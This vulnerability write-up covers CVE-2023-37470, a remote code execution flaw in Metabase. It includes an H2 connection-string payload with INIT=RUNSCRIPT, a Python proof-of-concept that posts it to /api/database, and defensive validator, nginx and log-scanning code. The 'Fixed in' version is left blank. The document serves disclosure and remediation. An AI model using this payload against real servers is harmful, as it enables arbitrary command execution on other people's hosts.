Metabase is a widely used open-source business intelligence (BI) and analytics platform, popular for helping users visualize and analyze their data with ease. In mid-2023, a serious vulnerability surfaced—CVE-2023-37470—resulting in a potentially devastating Remote Code Execution (RCE) threat for Metabase installations. This write-up explains the vulnerability in plain language, shares code and exploit details, and guides you through effective remediation steps.

## What is the Problem?

CVE-2023-37470 stems from unsafe handling of database connection strings when Metabase connects to certain data warehouses, specifically the embedded in-memory H2 Database. When admins or users add a new database to Metabase (or through setup), they provide a connection string. Unfortunately, H2’s connection string parser allows you to embed Java code, which the underlying database engine executes.

Metabase exposed a REST API endpoint that tests a connection string before the new database configuration is saved, and this endpoint did not properly sanitize user input. A malicious actor could exploit it to run arbitrary code on the machine hosting Metabase.

## Affected Versions

- At risk: Metabase versions before 1.46.6.4
- Fixed in:

## How Does the Exploit Work?

The attacker sends a specially crafted connection string for the H2 database, using a *Java code execution* feature embedded in H2 itself. This connection string is sent to an API endpoint such as /api/database or /api/setup/validate—where Metabase attempts to connect using the provided string, thereby executing the code.

1. Attacker crafts a malicious H2 connection string (see below).
2. Attacker sends a POST request to /api/database or /api/setup/validate with this connection string.
3. Metabase, without proper sanitization, says “Let’s test this connection!” and runs the string.
4. The malicious code in the connection string is executed with the privileges of the Metabase process.

### 1. Malicious H2 Connection String

The H2 connection string supports the INIT parameter, which allows running Java code or importing scripts. Here’s an example using Linux’s touch command to create a file (/tmp/pwned.txt) to show code execution, but attackers could use any command.

```
jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'
```
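The missing check, as an added example for this write-up rather than Metabase's own validation code: the Python below splits an H2 JDBC URL into its `;`-separated settings and refuses any string that carries an INIT clause, whether it is written plainly, in mixed case, or percent-encoded. The function names and the `DANGEROUS_SETTINGS` denylist are assumptions made for the example; the stronger fix, which the summary below credits Metabase with, is to refuse H2 as a user-configurable engine altogether.

```python
"""Added example: reject H2 JDBC connection strings that carry an INIT clause.

Illustrative code for this write-up, not Metabase's own validation logic.
validate_h2_connection_string and DANGEROUS_SETTINGS are assumed names.
"""
from urllib.parse import unquote

# H2 JDBC URLs look like: jdbc:h2:<mode>:<path>;SETTING=value;SETTING2=value2
H2_PREFIX = "jdbc:h2:"

# Connection-time settings that can run SQL or load code when the connection
# is opened. INIT is the one CVE-2023-37470 abused; the set is a constructed
# denylist for this example, not an exhaustive list of H2 settings.
DANGEROUS_SETTINGS = {"INIT"}


def parse_h2_url(url):
    """Split an H2 JDBC URL into (base, {SETTING: value}).

    Percent-decoding happens first so an encoded ';INIT=' cannot slip past a
    naive substring check. H2 setting names are case-insensitive, so keys are
    normalised to upper case before comparison.
    """
    url = unquote(url.strip())
    if not url.lower().startswith(H2_PREFIX):
        raise ValueError("not an H2 JDBC URL")
    base, *parts = url.split(";")
    settings = {}
    for part in parts:
        if not part.strip():
            continue
        key, _, value = part.partition("=")
        settings[key.strip().upper()] = value.strip()
    return base, settings


def validate_h2_connection_string(url):
    """Return (ok, reason); ok is False when the URL could execute code on connect."""
    try:
        _base, settings = parse_h2_url(url)
    except ValueError as exc:
        return False, str(exc)
    found = DANGEROUS_SETTINGS & set(settings)
    if found:
        return False, "disallowed H2 setting(s): " + ", ".join(sorted(found))
    return True, "ok"


if __name__ == "__main__":
    # Constructed candidates: the string from this write-up, an encoded
    # variant of it, and a harmless in-memory URL.
    for candidate in (
        "jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'",
        "jdbc:h2:mem:testdb%3Binit%3DRUNSCRIPT FROM 'x'",
        "jdbc:h2:mem:testdb;DB_CLOSE_DELAY=-1",
    ):
        print(validate_h2_connection_string(candidate), candidate)
```

Decoding before splitting is the part worth copying: a check that only looks for the literal text `;INIT=` in the raw request body is defeated by encoding or by whitespace around the setting name, which is why the example normalises first and compares setting names, not substrings.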

### 2. Example Exploit Python Code

Here’s a simple Python script to exploit an *unpatched* Metabase server by sending the malicious H2 connection string to the POST /api/database endpoint:

```python
import requests

# Target Metabase instance (database-creation endpoint)
url = 'http://metabase.example.com/api/database'
headers = {
    'Content-Type': 'application/json',
    # Add Authorization header if the API requires authentication
}

# Database-creation payload; the "db" field carries the H2 INIT clause
data = {
    "name": "malicious-db",
    "engine": "h2",
    "details": {
        "db": "jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'"
    },
    "is_full_sync": False,
    "is_on_demand": False,
    "options": None,
    "auto_run_queries": True
}

# Metabase tests the connection on save, which is where the string runs
response = requests.post(url, json=data, headers=headers)

print("Status:", response.status_code)
print("Body:", response.text)
```

If the attack succeeds, /tmp/pwned.txt will be created on the server running Metabase.

## Exploitation Demo Reference

- Public Metabase advisory
- H2 Database Documentation - SQL Grammar: RUNSCRIPT
- NIST NVD Entry

## Remediation

- Network-level protection: Block these endpoints to all users except trusted admins
  - POST /api/database
  - PUT /api/database/:id
  - POST /api/setup/validate

```nginx
location ~ ^/api/(database|setup/validate) {
    allow 127.0.0.1;  # Only allow localhost/admins
    deny all;
}
```

- Audit existing connections: Remove any suspicious databases using H2, and check for unknown files or processes on your Metabase host.
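To back the "monitor endpoints" and "audit existing connections" advice with something runnable, here is an added example written for this write-up (not Metabase code). It scans constructed proxy-style log lines for POST/PUT requests to the three endpoints above whose body names the H2 engine or carries an INIT clause, and it audits a list of saved database records for the same markers. The log-line format, the record shape (name, engine, details.db) and the function names are assumptions; adapt `LOG_LINE` to what your proxy or application logger actually emits.

```python
"""Added example: spot CVE-2023-37470-style activity in request logs and in
the saved database list.

Illustrative code for this write-up, not part of Metabase. The log line
format is constructed: '<client ip> "<METHOD> <path>" <status> <json body or ->'.
"""
import json
import re
from urllib.parse import unquote

# The endpoints this write-up recommends restricting (PUT /api/database/:id included).
SENSITIVE_ENDPOINTS = re.compile(r"^/api/(database(/\d+)?|setup/validate)$")

# An INIT clause in an H2 URL, checked after percent-decoding; case-insensitive.
INIT_CLAUSE = re.compile(r"(?i)\bINIT\s*=")

# Constructed log format (assumption): ip "METHOD path" status body
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) (?P<body>.*)$'
)


def analyze_log_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]
    if m.group("method") not in ("POST", "PUT") or not SENSITIVE_ENDPOINTS.match(path):
        return None
    body = unquote(m.group("body"))
    reasons = []
    if INIT_CLAUSE.search(body):
        reasons.append("H2 INIT clause in request body")
    try:
        if json.loads(body).get("engine") == "h2":
            reasons.append("engine=h2 submitted to database API")
    except (ValueError, AttributeError):
        pass  # body is not a JSON object (e.g. '-'); nothing more to check
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": path, "status": m.group("status"), "reasons": reasons}


def scan_log(lines):
    """Run analyze_log_line over an iterable of lines and return the findings."""
    return [f for f in (analyze_log_line(ln) for ln in lines) if f]


def audit_databases(databases):
    """Return names of saved databases that use H2 or carry an INIT clause.

    `databases` is a list of records shaped like the output of GET /api/database
    (name, engine, details); that shape is an assumption for this example.
    """
    flagged = []
    for db in databases:
        conn = unquote(str(db.get("details", {}).get("db", "")))
        if db.get("engine") == "h2" or INIT_CLAUSE.search(conn):
            flagged.append(db["name"])
    return flagged


# Constructed sample log; the second line carries the connection string from
# the exploit section of this write-up.
_EXPLOIT_BODY = json.dumps({
    "name": "malicious-db", "engine": "h2",
    "details": {"db": "jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'"},
})
SAMPLE_LOG = [
    '10.0.0.5 "GET /api/database" 200 -',
    f'10.0.0.9 "POST /api/database" 200 {_EXPLOIT_BODY}',
    '10.0.0.7 "POST /api/setup/validate" 400 {"details": {"engine": "postgres"}}',
    '10.0.0.9 "PUT /api/database/3" 200 {"engine": "h2", "details": {"db": "jdbc:h2:mem:scratch"}}',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("flagged databases:", audit_databases([
        {"name": "prod", "engine": "postgres", "details": {"host": "db.internal"}},
        {"name": "scratch", "engine": "h2", "details": {"db": "jdbc:h2:mem:scratch"}},
    ]))
```

The finding keeps the status code for context, but since the point of this vulnerability is that the connection test itself executes the string, a match is worth investigating whatever status the request received. Any H2 database turning up in `audit_databases` on a production instance is a configuration to remove, per the bullet above.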

---

## Summary

CVE-2023-37470 in Metabase is a classic example of “dangerous defaults”—a powerful connection string feature in H2, left unchecked, opened the door to system takeover via simple HTTP requests. This bug impacted all unpatched Metabase servers, until core changes disabled H2 as a user-configurable backend.

### Upgrade now, monitor endpoints, and beware of exotic connection string tricks in any web app handling database setup.

---

#### References & Further Reading

- Metabase Security Advisory
- Official Metabase Changelog
- H2 Database Documentation
- NIST CVE-2023-37470

---

*Keep your software current, and never underestimate the risk in connection strings!*

## Timeline

Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/09/2023 20:57:00 UTC